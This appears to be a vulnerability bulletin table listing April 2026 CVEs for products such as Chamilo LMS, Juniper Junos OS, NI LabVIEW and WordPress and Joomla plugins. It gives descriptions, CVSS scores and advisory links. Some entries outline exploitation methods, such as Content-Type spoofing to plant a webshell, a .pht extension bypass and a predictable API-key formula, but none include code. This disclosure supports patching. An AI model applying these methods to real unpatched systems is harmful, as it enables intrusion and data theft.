| NI--LabVIEW | There is a memory corruption vulnerability due to an out-of-bounds write in ResFileFactory::InitResourceMgr() in NI LabVIEW. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI file. This vulnerability affects NI LabVIEW 2026 Q1 (26.1.0) and prior versions. | 2026-04-07 | 7.8 | CVE-2026-32862 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/2026/memory-corruption-vulnerabilities-in-ni-labview.html |
| NI--LabVIEW | There is a memory corruption vulnerability due to an out-of-bounds read in sentry_transaction_context_set_operation() in NI LabVIEW. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI file. This vulnerability affects NI LabVIEW 2026 Q1 (26.1.0) and prior versions. | 2026-04-07 | 7.8 | CVE-2026-32863 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/2026/memory-corruption-vulnerabilities-in-ni-labview.html |
| NI--LabVIEW | There is a memory corruption vulnerability due to an out-of-bounds read in mgcore_SH_25_3!aligned_free() in NI LabVIEW. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI file. This vulnerability affects NI LabVIEW 2026 Q1 (26.1.0) and prior versions. | 2026-04-07 | 7.8 | CVE-2026-32864 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/2026/memory-corruption-vulnerabilities-in-ni-labview.html |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) vulnerability in the gradebook result view page allows any authenticated teacher to delete any student's grade result across the entire platform by manipulating the delete_mark or resultdelete GET parameters. No ownership or course-scope verification is performed. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. | 2026-04-10 | 7.1 | CVE-2026-32894 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-rqpg-p95v-fv98 https://github.com/chamilo/chamilo-lms/commit/3b03306d1a0301a81b9284e86893b27f518ab151 https://github.com/chamilo/chamilo-lms/commit/740f5a6e192a52a3adde3c3241c86401b1d2c519 |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) vulnerability in the gradebook evaluation edit page allows any authenticated teacher to view and modify the settings (name, max score, weight) of evaluations belonging to any other course by manipulating the editeval GET parameter. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. | 2026-04-10 | 7.1 | CVE-2026-32930 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-9h22-wrg7-82q6 https://github.com/chamilo/chamilo-lms/commit/63e1e6d3d717bd537c7c61719416da35aaa658dd https://github.com/chamilo/chamilo-lms/commit/f03f681df939db0429edc8414fb3ce4e4b80d79d |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an unrestricted file upload vulnerability in the exercise sound upload function allows an authenticated teacher to upload a PHP webshell by spoofing the Content-Type header to audio/mpeg. The uploaded file retains its original .php extension and is placed in a web-accessible directory, enabling Remote Code Execution as the web server user (www-data). This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. | 2026-04-10 | 7.5 | CVE-2026-32931 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-863j-h6pf-3xhx https://github.com/chamilo/chamilo-lms/commit/8cbe660de267f2b6ed625433bdfcf38dee8752b4 https://github.com/chamilo/chamilo-lms/commit/d5ef5153df3d1b2de112cbeb190cdd10bea457f3 |
| aces--Loris | LORIS (Longitudinal Online Research and Imaging System) is a self-hosted web application that provides data- and project-management for neuroimaging research. Prior to 27.0.3 and 28.0.1, a SQL injection has been identified in some code sections for the MRI feedback popup window of the imaging browser. Attackers can use SQL ingestion to access/alter data on the server. This vulnerability is fixed in 27.0.3 and 28.0.1. | 2026-04-08 | 7.5 | CVE-2026-33350 | https://github.com/aces/Loris/security/advisories/GHSA-9r29-6jgc-3ggh |
| Elastic--Kibana | Incorrect Authorization (CWE-863) in Kibana can lead to information disclosure via Privilege Abuse (CAPEC-122). A user with limited Fleet privileges can exploit an internal API endpoint to retrieve sensitive configuration data, including private keys and authentication tokens, that should only be accessible to users with higher-level settings privileges. The endpoint composes its response by fetching full configuration objects and returning them directly, bypassing the authorization checks enforced by the dedicated settings APIs. | 2026-04-08 | 7.7 | CVE-2026-33461 | https://discuss.elastic.co/t/kibana-8-19-14-9-2-8-9-3-3-security-update-esa-2026-24/385812 |
| distribution--distribution | Distribution is a toolkit to pack, ship, store, and deliver container content. Prior to 3.1.0, in pull-through cache mode, distribution discovers token auth endpoints by parsing WWW-Authenticate challenges returned by the configured upstream registry. The realm URL from a bearer challenge is used without validating that it matches the upstream registry host. As a result, an attacker-controlled upstream (or an attacker with MitM position to the upstream) can cause distribution to send the configured upstream credentials via basic auth to an attacker-controlled realm URL. This vulnerability is fixed in 3.1.0. | 2026-04-06 | 7.5 | CVE-2026-33540 | https://github.com/distribution/distribution/security/advisories/GHSA-3p65-76g6-3w7r |
| themeum--Tutor LMS eLearning and online course solution | The Tutor LMS - eLearning and online course solution plugin for WordPress is vulnerable to an Insecure Direct Object Reference in all versions up to, and including, 3.9.7. This is due to missing authentication and authorization checks in the `pay_incomplete_order()` function. The function accepts an attacker-controlled `order_id` parameter and uses it to look up order data, then writes billing fields to the order owner's profile (`$order_data->user_id`) without verifying the requester's identity or ownership. Because the Tutor nonce (`_tutor_nonce`) is exposed on public frontend pages, this makes it possible for unauthenticated attackers to overwrite the billing profile (name, email, phone, address) of any user who has an incomplete manual order, by sending a crafted POST request with a guessed or enumerated `order_id`. | 2026-04-10 | 7.5 | CVE-2026-3360 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7f365519-dd0a-4f39-880d-7216ce2f7d1e?source=cve https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Tutor.php#L563 https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/ecommerce/CheckoutController.php#L108 https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/ecommerce/CheckoutController.php#L1059 https://plugins.trac.wordpress.org/browser/tutor/trunk/ecommerce/CheckoutController.php#L1059 https://plugins.trac.wordpress.org/changeset/3496394/tutor/trunk/ecommerce/CheckoutController.php |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains an Insecure Direct Object Reference (IDOR) vulnerability in the Learning Path progress saving endpoint. The file lp_ajax_save_item.php accepts a uid (user ID) parameter directly from $_REQUEST and uses it to load and modify another user's Learning Path progress - including score, status, completion, and time - without verifying that the requesting user matches the target user ID. Any authenticated user enrolled in a course can overwrite another user's Learning Path progress by simply changing the uid parameter in the request. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. | 2026-04-10 | 7.1 | CVE-2026-33702 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-3rv7-9fhx-j654 https://github.com/chamilo/chamilo-lms/commit/6331d051b4468deb5830c01d1e047c5e5cf2c74f https://github.com/chamilo/chamilo-lms/commit/bf3f6c6949b5c882b48a9914baa19910417e4551 |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38, any authenticated user (including students) can write arbitrary content to files on the server via the BigUpload endpoint. The key parameter controls the filename and the raw POST body becomes the file content. While .php extensions are filtered to .phps, the .pht extension passes through unmodified. On Apache configurations where .pht is handled as PHP, this leads to Remote Code Execution. This vulnerability is fixed in 1.11.38. | 2026-04-10 | 7.1 | CVE-2026-33704 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-phfx-pwwg-945v https://github.com/chamilo/chamilo-lms/commit/9748f1ffbdb8b6dc84c0e0591c9d3c1d92e21c00 |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38, any authenticated user with a REST API key can modify their own status field via the update_user_from_username endpoint. A student (status=5) can change their status to Teacher/CourseManager (status=1), gaining course creation and management privileges. This vulnerability is fixed in 1.11.38. | 2026-04-10 | 7.1 | CVE-2026-33706 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-3gqc-xr75-pcpw https://github.com/chamilo/chamilo-lms/commit/0acf8a196307c66c049f97f5ff76cf21c4a08127 |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, REST API keys are generated using md5(time() + (user_id * 5) - rand(10000, 10000)). The rand(10000, 10000) call always returns exactly 10000 (min == max), making the formula effectively md5(timestamp + user_id*5 - 10000). An attacker who knows a username and approximate key creation time can brute-force the API key. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. | 2026-04-10 | 7.5 | CVE-2026-33710 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-rpmg-j327-mr39 https://github.com/chamilo/chamilo-lms/commit/4448701bb8ec557e94ef02d19c72cbe9c49c2d09 https://github.com/chamilo/chamilo-lms/commit/e7400dd840586ae134b286d0a2374f3d269a9a9d |
| saleor--saleor | Saleor is an e-commerce platform. From 2.0.0 to before 3.23.0a3, 3.22.47, 3.21.54, and 3.20.118, Saleor supports query batching by submitting multiple GraphQL operations in a single HTTP request as a JSON array but wasn't enforcing any upper limit on the number of operations. This allowed an unauthenticated attacker to send a single HTTP request many operations (bypassing the per query complexity limit) to exhaust resources. This vulnerability is fixed in 3.23.0a3, 3.22.47, 3.21.54, and 3.20.118. | 2026-04-08 | 7.5 | CVE-2026-33756 | https://github.com/saleor/saleor/security/advisories/GHSA-24jw-f244-qfpp https://github.com/saleor/saleor/commit/7be352fa8c35875d6e66d36493ca7c14c101bd64 https://github.com/saleor/saleor/commit/cdb66da97abb7c86939e384914cd8d9194f378e8 https://github.com/saleor/saleor/commit/d6a94e95bd77f3f733fa66afd1b1ac72e863ca2a https://github.com/saleor/saleor/commit/e42aa4d6e588982e78942b033af051c8ec8f43fa https://github.com/saleor/saleor/commit/f0371bdd4cafcc841f1a9e7049cead6133bf7464 |
| Juniper Networks--CTP OS | A Weak Password Requirements vulnerability in the password management function of Juniper Networks CTP OS might allow an unauthenticated, network-based attacker to exploit weak passwords of local accounts and potentially take full control of the device. The password management menu enables the administrator to set password complexity requirements, but these settings are not saved. The issue can be verified with the menu option "Show password requirements". Failure to enforce the intended requirements can lead to weak passwords being used, which significantly increases the likelihood that an attacker can guess these and subsequently attain unauthorized access. This issue affects CTP OS versions 9.2R1 and 9.2R2. | 2026-04-09 | 7.4 | CVE-2026-33771 | https://kb.juniper.net/JSA107864 |
| Juniper Networks--Junos OS | An Improper Validation of Syntactic Correctness of Input vulnerability in the IPsec library used by kmd and iked of Juniper Networks Junos OS on SRX Series and MX Series allows an unauthenticated, network-based attacker to cause a complete Denial-of-Service (DoS). If an affected device receives a specifically malformed first ISAKMP packet from the initiator, the kmd/iked process will crash and restart, which momentarily prevents new security associations (SAs) for from being established. Repeated exploitation of this vulnerability causes a complete inability to establish new VPN connections. This issue affects Junos OS on SRX Series and MX Series: * all versions before 22.4R3-S9, * 23.2 version before 23.2R2-S6, * 23.4 version before 23.4R2-S7, * 24.2 versions before 24.2R2-S4, * 24.4 versions before 24.4R2-S3, * 25.2 versions before 25.2R1-S2, 25.2R2. | 2026-04-09 | 7.5 | CVE-2026-33778 | https://kb.juniper.net/JSA107868 |
| Juniper Networks--Junos OS Evolved | A Missing Authentication for Critical Function vulnerability in the Flexible PIC Concentrators (FPCs) of Juniper Networks Junos OS Evolved on PTX Series allows a local, authenticated attacker with low privileges to gain direct access to FPCs installed in the device. A local user with low privileges can gain direct access to the installed FPCs as a high privileged user, which can potentially lead to a full compromise of the affected component. This issue affects Junos OS Evolved on PTX10004, PTX10008, PTX100016, with JNP10K-LC1201 or JNP10K-LC1202: * All versions before 21.2R3-S8-EVO, * 21.4-EVO versions before 21.4R3-S7-EVO, * 22.2-EVO versions before 22.2R3-S4-EVO, * 22.3-EVO versions before 22.3R3-S3-EVO, * 22.4-EVO versions before 22.4R3-S2-EVO, * 23.2-EVO versions before 23.2R2-EVO. | 2026-04-09 | 7.8 | CVE-2026-33788 | https://kb.juniper.net/JSA107806 |
| Juniper Networks--Junos OS | An Improper Check for Unusual or Exceptional Conditions vulnerability in the flow daemon (flowd) of Juniper Networks Junos OS on SRX Series allows an attacker sending a specific, malformed ICMPv6 packet to cause the srxpfe process to crash and restart. Continued receipt and processing of these packets will repeatedly crash the srxpfe process and sustain the Denial of Service (DoS) condition. During NAT64 translation, receipt of a specific, malformed ICMPv6 packet destined to the device will cause the srxpfe process to crash and restart. This issue cannot be triggered using IPv4 nor other IPv6 traffic. This issue affects Junos OS on SRX Series: * all versions before 21.2R3-S10, * all versions of 21.3, * from 21.4 before 21.4R3-S12, * all versions of 22.1, * from 22.2 before 22.2R3-S8, * all versions of 22.4, * from 22.4 before 22.4R3-S9, * from 23.2 before 23.2R2-S6, * from 23.4 before 23.4R2-S7, * from 24.2 before 24.2R2-S3, * from 24.4 before 24.4R2-S3, * from 25.2 before 25.2R1-S2, 25.2R2. | 2026-04-09 | 7.5 | CVE-2026-33790 | https://kb.juniper.net/JSA107874 |
| Juniper Networks--Junos OS | An Execution with Unnecessary Privileges vulnerability in the User Interface (UI) of Juniper Networks Junos OS and Junos OS Evolved allows a local, low-privileged attacker to gain root privileges, thus compromising the system. When a configuration that allows unsigned Python op scripts is present on the device, a non-root user is able to execute malicious op scripts as a root-equivalent user, leading to privilege escalation. This issue affects Junos OS: * All versions before 22.4R3-S7, * from 23.2 before 23.2R2-S4, * from 23.4 before 23.4R2-S6, * from 24.2 before 24.2R1-S2, 24.2R2, * from 24.4 before 24.4R1-S2, 24.4R2; Junos OS Evolved: * All versions before 22.4R3-S7-EVO, * from 23.2 before 23.2R2-S4-EVO, * from 23.4 before 23.4R2-S6-EVO, * from 24.2 before 24.2R2-EVO, * from 24.4 before 24.4R1-S1-EVO, 24.4R2-EVO. | 2026-04-09 | 7.8 | CVE-2026-33793 | https://kb.juniper.net/JSA103142 |
| Juniper Networks--Junos OS | An Improper Input Validation vulnerability in Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, adjacent attacker, sending a specific genuine BGP packet in an already established BGP session to reset only that session causing a Denial of Service (DoS). An attacker repeatedly sending the packet will sustain the Denial of Service (DoS).This issue affects Junos OS: * 25.2 versions before 25.2R2 This issue doesn't not affected Junos OS versions before 25.2R1. This issue affects Junos OS Evolved: * 25.2-EVO versions before 25.2R2-EVO This issue doesn't not affected Junos OS Evolved versions before 25.2R1-EVO. eBGP and iBGP are affected. IPv4 and IPv6 are affected. | 2026-04-09 | 7.4 | CVE-2026-33797 | https://kb.juniper.net/JSA107850 |
| shamimmoeen--WCAPF Ajax Product Filter for WooCommerce | WCAPF - WooCommerce Ajax Product Filter plugin is vulnerable to time-based SQL Injection via the 'post-author' parameter in all versions up to, and including, 4.2.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-04-08 | 7.5 | CVE-2026-3396 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ee0a762e-9159-4dab-a7be-9cbe332effb1?source=cve https://plugins.trac.wordpress.org/browser/wc-ajax-product-filter/trunk/includes/class-wcapf-product-filter.php#L739 https://plugins.trac.wordpress.org/browser/wc-ajax-product-filter/trunk/includes/class-wcapf-product-filter.php#L689 https://plugins.trac.wordpress.org/browser/wc-ajax-product-filter/trunk/includes/class-wcapf-product-filter.php#L81 https://plugins.trac.wordpress.org/browser/wc-ajax-product-filter/trunk/includes/class-wcapf-product-filter.php#L65 https://plugins.trac.wordpress.org/changeset/3484080/ |
| @fedify--fedify | Fedify is a TypeScript library for building federated server apps powered by ActivityPub. Prior to 1.9.6, 1.10.5, 2.0.8, and 2.1.1, @fedify/fedify follows HTTP redirects recursively in its remote document loader and authenticated document loader without enforcing a maximum redirect count or visited-URL loop detection. An attacker who controls a remote ActivityPub key or actor URL can force a server using Fedify to make repeated outbound requests from a single inbound request, leading to resource consumption and denial of service. This vulnerability is fixed in 1.9.6, 1.10.5, 2.0.8, and 2.1.1. | 2026-04-06 | 7.5 | CVE-2026-34148 | https://github.com/fedify-dev/fedify/security/advisories/GHSA-gm9m-gwc4-hwgp https://github.com/fedify-dev/fedify/releases/tag/1.10.5 https://github.com/fedify-dev/fedify/releases/tag/1.9.6 https://github.com/fedify-dev/fedify/releases/tag/2.0.8 https://github.com/fedify-dev/fedify/releases/tag/2.1.1 |
| AcademySoftwareFoundation--openexr | OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From 3.2.0 to before 3.2.7, 3.3.9, and 3.4.9, a misaligned memory write vulnerability exists in LossyDctDecoder_execute() in src/lib/OpenEXRCore/internal_dwa_decoder.h:749. When decoding a DWA or DWAB-compressed EXR file containing a FLOAT-type channel, the decoder performs an in-place HALF→FLOAT conversion by casting an unaligned uint8_t * row pointer to float * and writing through it. Because the row buffer may not be 4-byte aligned, this constitutes undefined behavior under the C standard and crashes immediately on architectures that enforce alignment (ARM, RISC-V, etc.). On x86 it is silently tolerated at runtime but remains exploitable via compiler optimizations that assume aligned access. This vulnerability is fixed in 3.2.7, 3.3.9, and 3.4.9. | 2026-04-06 | 7.1 | CVE-2026-34379 | https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-w88v-vqhq-5p24 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.2.7 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.3.9 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.4.9 |
| aces--Loris | LORIS (Longitudinal Online Research and Imaging System) is a self-hosted web application that provides data- and project-management for neuroimaging research. From 20.0.0 to before 27.0.3 and 28.0.1, a bug in the static file router can allow an attacker to traverse outside of the intended directory, allowing unintended files to be downloaded through the static, css, and js endpoints. This vulnerability is fixed in 27.0.3 and 28.0.1. | 2026-04-08 | 7.5 | CVE-2026-34392 | https://github.com/aces/Loris/security/advisories/GHSA-rfj5-58hv-wc5f |
| go-vikunja--vikunja | Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the OIDC callback handler issues a full JWT token without checking whether the matched user has TOTP two-factor authentication enabled. When a local user with TOTP enrolled is matched via the OIDC email fallback mechanism, the second factor is completely skipped. This vulnerability is fixed in 2.3.0. | 2026-04-10 | 7.4 | CVE-2026-34727 | https://github.com/go-vikunja/vikunja/security/advisories/GHSA-8jvc-mcx6-r4cg |
| HDFGroup--hdf5 | HDF5 is software for managing data. In 1.14.1-2 and earlier, a heap-use-after-free was found in the h5dump helper utility. An attacker who can supply a malicious h5 file can trigger a heap use-after-free. The freed object is referenced in a memmove call from H5T__conv_struct. The original object was allocated by H5D__typeinfo_init_phase3 and freed by H5D__typeinfo_term. | 2026-04-09 | 7.8 | CVE-2026-34734 | https://github.com/HDFGroup/hdf5/security/advisories/GHSA-w7v2-9cmr-pwwj |
| Analytify--Under Construction, Coming Soon & Maintenance Mode | Cross-Site Request Forgery (CSRF) vulnerability in Analytify Under Construction, Coming Soon & Maintenance Mode allows Cross Site Request Forgery.This issue affects Under Construction, Coming Soon & Maintenance Mode: from n/a through 2.1.1. | 2026-04-07 | 7.5 | CVE-2026-34896 | https://patchstack.com/database/wordpress/plugin/under-construction-maintenance-mode/vulnerability/wordpress-under-construction-coming-soon-maintenance-mode-plugin-2-1-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Analytify--Simple Social Media Share Buttons | Cross-Site Request Forgery (CSRF) vulnerability in Analytify Simple Social Media Share Buttons allows Cross Site Request Forgery.This issue affects Simple Social Media Share Buttons: from n/a through 6.2.0. | 2026-04-07 | 7.5 | CVE-2026-34904 | https://patchstack.com/database/wordpress/plugin/simple-social-buttons/vulnerability/wordpress-simple-social-media-share-buttons-plugin-6-2-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
Medium Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Dynalon--MDwiki | MDwiki contains a cross-site scripting vulnerability that allows remote attackers to execute arbitrary JavaScript by injecting malicious code through the location hash parameter. Attackers can craft URLs with JavaScript payloads in the hash fragment that are parsed and rendered without sanitization, causing the injected scripts to execute in the victim's browser context. | 2026-04-12 | 6.1 | CVE-2017-20239 | ExploitDB-46097 VulnCheck Advisory: MDwiki Cross-Site Scripting via Location Hash Parameter |
| NSauditor--SpotFTP Password Recover | SpotFTP Password Recover 2.4.2 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an oversized buffer in the Name field during registration. Attackers can generate a 256-byte payload, paste it into the Name input field, and trigger a crash when submitting the registration code. | 2026-04-12 | 6.2 | CVE-2019-25711 | ExploitDB-46088 VulnCheck Advisory: SpotFTP Password Recover 2.4.2 Denial of Service via Name Field |
| NSauditor--BlueAuditor | BlueAuditor 1.7.2.0 contains a buffer overflow vulnerability in the registration key field that allows local attackers to crash the application by submitting an oversized key value. Attackers can trigger a denial of service by entering a 256-byte buffer of repeated characters in the Key registration field, causing the application to crash during registration processing. | 2026-04-12 | 6.2 | CVE-2019-25712 | ExploitDB-46087 VulnCheck Advisory: BlueAuditor 1.7.2.0 Buffer Overflow Denial of Service via Registration Key |
| Synology--Synology SSL VPN Client | A files or directories accessible to external parties vulnerability in Synology SSL VPN Client before 1.4.5-0684 allows remote attackers to access files within the installation directory via a local HTTP server bound to the loopback interface. By leveraging user interaction with a crafted web page, attackers may retrieve sensitive files such as configuration files, certificates, and logs, leading to information disclosure. | 2026-04-10 | 6.5 | CVE-2021-47960 | Synology-SA-26:05 Synology SSL VPN Client |
| Adivaha--WordPress adivaha Travel Plugin | WordPress adivaha Travel Plugin 2.3 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating the isMobile parameter. Attackers can craft malicious URLs containing JavaScript payloads in the isMobile GET parameter at the /mobile-app/v3/ endpoint to execute arbitrary code in victims' browsers and steal session tokens or credentials. | 2026-04-09 | 6.1 | CVE-2023-54358 | ExploitDB-51663 Official Product Homepage Product Reference VulnCheck Advisory: WordPress adivaha Travel Plugin 2.3 Reflected XSS via isMobile |
| Jlexart--Joomla JLex Review | Joomla JLex Review 6.0.1 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by manipulating the review_id URL parameter. Attackers can craft malicious links containing JavaScript payloads that execute in victims' browsers when clicked, enabling session hijacking or credential theft. | 2026-04-09 | 6.1 | CVE-2023-54360 | ExploitDB-51645 Official Product Homepage Product Reference VulnCheck Advisory: Joomla JLex Review 6.0.1 Reflected XSS via review_id Parameter |
| Thethinkery--Joomla iProperty Real Estate | Joomla iProperty Real Estate 4.1.1 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by manipulating the filter_keyword parameter. Attackers can craft URLs containing JavaScript payloads in the filter_keyword GET parameter of the all-properties-with-map endpoint to execute arbitrary code in victim browsers and steal session tokens or credentials. | 2026-04-09 | 6.1 | CVE-2023-54361 | ExploitDB-51640 Official Product Homepage Product Reference VulnCheck Advisory: Joomla iProperty Real Estate 4.1.1 Reflected XSS via filter_keyword |
| Virtuemart--Cart | Joomla VirtueMart Shopping-Cart 4.0.12 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by manipulating the keyword parameter. Attackers can craft malicious URLs containing script payloads in the keyword parameter of the product-variants endpoint to execute arbitrary JavaScript in victim browsers and steal session tokens or credentials. | 2026-04-09 | 6.1 | CVE-2023-54362 | ExploitDB-51631 Official Product Homepage Product Reference VulnCheck Advisory: Joomla VirtueMart Shopping-Cart 4.0.12 Reflected XSS via keyword |
| Solidres--Joomla Solidres | Joomla Solidres 2.13.3 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating multiple GET parameters including show, reviews, type_id, distance, facilities, categories, prices, location, and Itemid. Attackers can craft malicious URLs containing JavaScript payloads in these parameters to steal session tokens, login credentials, or manipulate site content when victims visit the crafted links. | 2026-04-09 | 6.1 | CVE-2023-54363 | ExploitDB-51638 Official Product Homepage Product Reference VulnCheck Advisory: Joomla Solidres 2.13.3 Reflected XSS via Multiple Parameters |
| Hikashop--Joomla HikaShop | Joomla HikaShop 4.7.4 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating GET parameters in the product filter endpoint. Attackers can craft malicious URLs containing XSS payloads in the from_option, from_ctrl, from_task, or from_itemid parameters to steal session tokens or login credentials when victims visit the link. | 2026-04-09 | 6.1 | CVE-2023-54364 | ExploitDB-51629 Official Product Homepage Product Reference VulnCheck Advisory: Joomla HikaShop 4.7.4 Reflected XSS via Product Filter |
| IBM--Concert | IBM Concert 1.0.0 through 2.2.0 creates temporary files with predictable names, which allows local users to overwrite arbitrary files via a symlink attack. | 2026-04-07 | 6.2 | CVE-2025-13044 | https://www.ibm.com/support/pages/node/7268620 |
| elemntor--Elementor Website Builder more than just a page builder | The Elementor Website Builder - More Than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several widget parameters in all versions up to, and including, 3.35.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-04-08 | 6.4 | CVE-2025-14732 | https://www.wordfence.com/threat-intel/vulnerabilities/id/20232d70-72b2-47b7-ac7e-ad07892864ef?source=cve https://plugins.trac.wordpress.org/browser/elementor/trunk/modules/wp-rest/classes/elementor-post-meta.php#L67 https://plugins.trac.wordpress.org/changeset?old_path=/elementor/tags/3.35.5&new_path=/elementor/tags/3.35.6 |
| Juniper Networks--Junos OS | A Missing Authentication for Critical Function vulnerability in command processing of Juniper Networks Junos OS allows a privileged local attacker to gain access to line cards running Junos OS Evolved as root. This issue affects systems running Junos OS using Linux-based line cards. Affected line cards include: * MPC7, MPC8, MPC9, MPC10, MPC11 * LC2101, LC2103 * LC480, LC4800, LC9600 * MX304 (built-in FPC) * MX-SPC3 * SRX5K-SPC3 * EX9200-40XS * FPC3-PTX-U2, FPC3-PTX-U3 * FPC3-SFF-PTX * LC1101, LC1102, LC1104, LC1105 This issue affects Junos OS: * all versions before 22.4R3-S8, * from 23.2 before 23.2R2-S6, * from 23.4 before 23.4R2-S6, * from 24.2 before 24.2R2-S3, * from 24.4 before 24.4R2, * from 25.2 before 25.2R2. | 2026-04-08 | 6.7 | CVE-2025-30650 | https://github.com/orangecertcc/security-research/security/advisories/GHSA-fwhc-gh5m-v8fq https://kb.juniper.net/JSA107863 |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when accessing freed memory due to concurrent fence deregistration and signal handling. | 2026-04-06 | 6.5 | CVE-2025-47374 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Siklu--EtherHaul 8010 | Siklu EtherHaul 8010 siklu-uimage-nxp-enc-10_6_2-18707-ea552dc00b devices have a static root password. | 2026-04-08 | 6.4 | CVE-2025-57175 | https://semaja2.net/2025/04/30/siklu-eh-firmware-decryption/ |
| Red Hat--Red Hat Ansible Automation Platform 2 | A container privilege escalation flaw was found in certain Ansible Automation Platform images. This issue arises from the /etc/passwd file being created with group-writable permissions during the build process. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This vulnerability allows an attacker to add a new user with any arbitrary UID, including UID 0, gaining full root privileges within the container. | 2026-04-08 | 6.4 | CVE-2025-57847 | https://access.redhat.com/security/cve/CVE-2025-57847 RHBZ#2391092 |
| Red Hat--Multicluster Engine for Kubernetes | A container privilege escalation flaw was found in certain Multicluster Engine for Kubernetes images. This issue stems from the /etc/passwd file being created with group-writable permissions during build time. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container. | 2026-04-08 | 6.4 | CVE-2025-57851 | https://access.redhat.com/security/cve/CVE-2025-57851 RHBZ#2391104 |
| Red Hat--Red Hat Web Terminal | A container privilege escalation flaw was found in certain Web Terminal images. This issue stems from the /etc/passwd file being created with group-writable permissions during build time. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container. | 2026-04-08 | 6.4 | CVE-2025-57853 | https://access.redhat.com/security/cve/CVE-2025-57853 RHBZ#2391106 |
| Red Hat--Red Hat OpenShift Update Service | A container privilege escalation flaw was found in certain OpenShift Update Service (OSUS) images. This issue stems from the /etc/passwd file being created with group-writable permissions during build time. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, may be able to leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container. | 2026-04-08 | 6.4 | CVE-2025-57854 | https://access.redhat.com/security/cve/CVE-2025-57854 RHBZ#2391107 |
| Red Hat--Red Hat Process Automation 7 | A container privilege escalation flaw was found in certain Red Hat Process Automation Manager images. This issue stems from the /etc/passwd file being created with group-writable permissions during build time. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container. | 2026-04-08 | 6.4 | CVE-2025-58713 | https://access.redhat.com/security/cve/CVE-2025-58713 RHBZ#2394419 |
